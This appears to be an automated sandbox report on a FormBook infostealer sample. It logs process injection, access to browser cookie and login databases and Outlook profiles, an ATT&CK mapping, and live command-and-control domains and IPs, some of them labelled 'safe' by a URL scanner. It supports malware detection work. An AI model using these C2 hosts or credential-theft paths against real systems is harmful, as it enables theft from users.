Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtQueryValueKey: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	NtTerminateThread: Direct from: 0x77377B2E	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\bitsadmin.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: NULL target: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: NULL target: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\bitsadmin.exe

Thread register set: target process: 5440

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2F9008

Jump to behavior

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_004587B1 LogonUserW,

0_2_004587B1

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403B3A

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_004048D7

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_00464C53 mouse_event,

0_2_00464C53

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\uG3I84bQEr.exe"	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00457CAF

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0045874B

Source: uG3I84bQEr.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: bGPwjAWMEtES.exe, 00000006.00000002.3472415844.0000000001681000.00000002.00000001.00040000.00000000.sdmp, bGPwjAWMEtES.exe, 00000006.00000000.2420949643.0000000001680000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: uG3I84bQEr.exe, bGPwjAWMEtES.exe, 00000006.00000002.3472415844.0000000001681000.00000002.00000001.00040000.00000000.sdmp, bGPwjAWMEtES.exe, 00000006.00000000.2420949643.0000000001680000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: bGPwjAWMEtES.exe, 00000006.00000002.3472415844.0000000001681000.00000002.00000001.00040000.00000000.sdmp, bGPwjAWMEtES.exe, 00000006.00000000.2420949643.0000000001680000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: bGPwjAWMEtES.exe, 00000006.00000002.3472415844.0000000001681000.00000002.00000001.00040000.00000000.sdmp, bGPwjAWMEtES.exe, 00000006.00000000.2420949643.0000000001680000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_0042862B cpuid

0_2_0042862B

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00434E87

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_00441E06 GetUserNameW,

0_2_00441E06

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00433F3A

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004049A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 3.2.svchost.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.500000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3471913898.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2505596273.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2505839285.00000000029A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3472823887.0000000005F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2506486835.0000000006550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3471962975.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3470661135.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\bitsadmin.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: uG3I84bQEr.exe	Binary or memory string: WIN_81
Source: uG3I84bQEr.exe	Binary or memory string: WIN_XP
Source: uG3I84bQEr.exe	Binary or memory string: WIN_XPe
Source: uG3I84bQEr.exe	Binary or memory string: WIN_VISTA
Source: uG3I84bQEr.exe	Binary or memory string: WIN_7
Source: uG3I84bQEr.exe	Binary or memory string: WIN_8
Source: uG3I84bQEr.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 3.2.svchost.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.500000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3471913898.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2505596273.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2505839285.00000000029A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3472823887.0000000005F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2506486835.0000000006550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3471962975.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3470661135.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00476283
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00476747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Service Execution	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Windows Service	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	126 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 Software Packing	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Windows Service	1 Timestomp	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	312 Process Injection	1 DLL Side-Loading	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Masquerading	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Valid Accounts	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	2 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	21 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	312 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
uG3I84bQEr.exe	82%	ReversingLabs	Win32.Virus.Expiro
uG3I84bQEr.exe	81%	Virustotal		Browse
uG3I84bQEr.exe	100%	Avira	W32/Infector.Gen
uG3I84bQEr.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Avira	W32/Infector.Gen
C:\Windows\System32\AppVClient.exe	100%	Avira	W32/Infector.Gen
C:\Windows\System32\alg.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Joe Sandbox ML
C:\Windows\System32\AppVClient.exe	100%	Joe Sandbox ML
C:\Windows\System32\alg.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.soainsaat.xyz	0%	Avira URL Cloud	safe
http://server/get.asp	0%	Avira URL Cloud	safe
http://www.soainsaat.xyz/rum2/	100%	Avira URL Cloud	malware
http://www.laohub10.net/sgdd/	0%	Avira URL Cloud	safe
http://18.141.10.107/(	0%	Avira URL Cloud	safe
http://www.laohub10.net/sgdd/?9V7X=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRjDpBSVBr7xCoBK9DVxTDHFUGGR5RoH3IsxqdsiGMvHVT1pqSHQ=&WldT=UFzdV2kX3	0%	Avira URL Cloud	safe
http://www.nb-shenshi.buzz/xxr1/?WldT=UFzdV2kX3&9V7X=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI=	0%	Avira URL Cloud	safe
http://18.141.10.107/dwlowhbefckeydsA	0%	Avira URL Cloud	safe
http://18.141.10.107:80/dwlowhbefckeyd	0%	Avira URL Cloud	safe
http://www.xcvbj.asia/rq1s/	0%	Avira URL Cloud	safe
http://18.141.10.107/dwlowhbefckeydx	0%	Avira URL Cloud	safe
http://54.244.188.177/	100%	Avira URL Cloud	malware
http://18.141.10.107/dwlowhbefckeyd	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
ssbzmoy.biz	18.141.10.107	true	false	high
pywolwnvd.biz	54.244.188.177	true	false	high
r0lqcud7.nbnnn.xyz	23.225.159.42	true	false	high
www.xcvbj.asia	149.88.81.190	true	false	high
www.nb-shenshi.buzz	161.97.142.144	true	false	high
natroredirect.natrocdn.com	85.159.66.93	true	false	high
www.laohub10.net	unknown	unknown	false	high
www.soainsaat.xyz	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.soainsaat.xyz/rum2/	true	Avira URL Cloud: malware	unknown
http://pywolwnvd.biz/exqctojotladvua	false		high
http://www.laohub10.net/sgdd/	true	Avira URL Cloud: safe	unknown
http://www.nb-shenshi.buzz/xxr1/?WldT=UFzdV2kX3&9V7X=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI=	true	Avira URL Cloud: safe	unknown
http://www.laohub10.net/sgdd/?9V7X=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRjDpBSVBr7xCoBK9DVxTDHFUGGR5RoH3IsxqdsiGMvHVT1pqSHQ=&WldT=UFzdV2kX3	true	Avira URL Cloud: safe	unknown
http://www.xcvbj.asia/rq1s/	true	Avira URL Cloud: safe	unknown
http://ssbzmoy.biz/dwlowhbefckeyd	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.soainsaat.xyz	bGPwjAWMEtES.exe, 00000006.00000002.3480937676.000000000950A000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://server/get.asp	svchost.exe, 00000003.00000003.2473240347.0000000002A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2473112981.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, bGPwjAWMEtES.exe, 00000006.00000003.2585902954.000000000120F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pywolwnvd.biz/	uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://18.141.10.107/	uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000DAC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://18.141.10.107/(	uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000DAC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://18.141.10.107/dwlowhbefckeydsA	uG3I84bQEr.exe, 00000000.00000002.2247919314.0000000000E33000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://18.141.10.107:80/dwlowhbefckeyd	uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000DAC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://18.141.10.107/dwlowhbefckeydx	uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://54.244.188.177/	uG3I84bQEr.exe, 00000000.00000002.2247919314.0000000000E33000.00000004.00000020.00020000.00000000.sdmp, uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000DAC000.00000004.00000020.00020000.00000000.sdmp, uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://18.141.10.107/dwlowhbefckeyd	uG3I84bQEr.exe, 00000000.00000002.2247919314.0000000000E33000.00000004.00000020.00020000.00000000.sdmp, uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.88.81.190	www.xcvbj.asia	United States	188	SAIC-ASUS	false
161.97.142.144	www.nb-shenshi.buzz	United States	51167	CONTABODE	false
23.225.159.42	r0lqcud7.nbnnn.xyz	United States	40065	CNSERVERSUS	false
54.244.188.177	pywolwnvd.biz	United States	16509	AMAZON-02US	false
18.141.10.107	ssbzmoy.biz	United States	16509	AMAZON-02US	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588344
Start date and time:	2025-01-11 00:59:43 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	uG3I84bQEr.exe renamed because original name is a hash value
Original Sample Name:	fced488bab6f8793e1ca19858cf208ebc5c2b0ee18087489a2a35eb7fee803af.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winEXE@9/9@6/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 78% Number of executed functions: 76 Number of non-executed functions: 241
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
19:00:45	API Interceptor	1x Sleep call for process: uG3I84bQEr.exe modified
19:01:48	API Interceptor	2035939x Sleep call for process: bitsadmin.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.88.81.190	PO 4110007694.exe	Get hash	malicious	FormBook	Browse	www.xcvbj.asia/rq1s/
	Latest advice payment.exe	Get hash	malicious	FormBook	Browse	www.xcvbj.asia/rq1s/
	Document_084462.scr.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.xcvbj.asia/hkgx/?2O=wgVoJ8uM9T0/Zez11uxn+VRLTSqblAamGOKD8PxxFFLfP5o8U05sZY2pknTlSn+/tcq1eo8k+yVAgRwnrxxUqTNM4+b8NMxfCgVpsHr1kyIADa2UTEjwUtE=&ChhG6=J-xs
	Proforma invoice - Arancia NZ.exe	Get hash	malicious	FormBook	Browse	www.xcvbj.asia/hkgx/
	OUTSTANDING BALANCE PAYMENT.exe	Get hash	malicious	FormBook	Browse	www.xcvbj.asia/rq1s/
	OUTSTANDING BALANCE PAYMENT.exe	Get hash	malicious	FormBook	Browse	www.xcvbj.asia/rq1s/
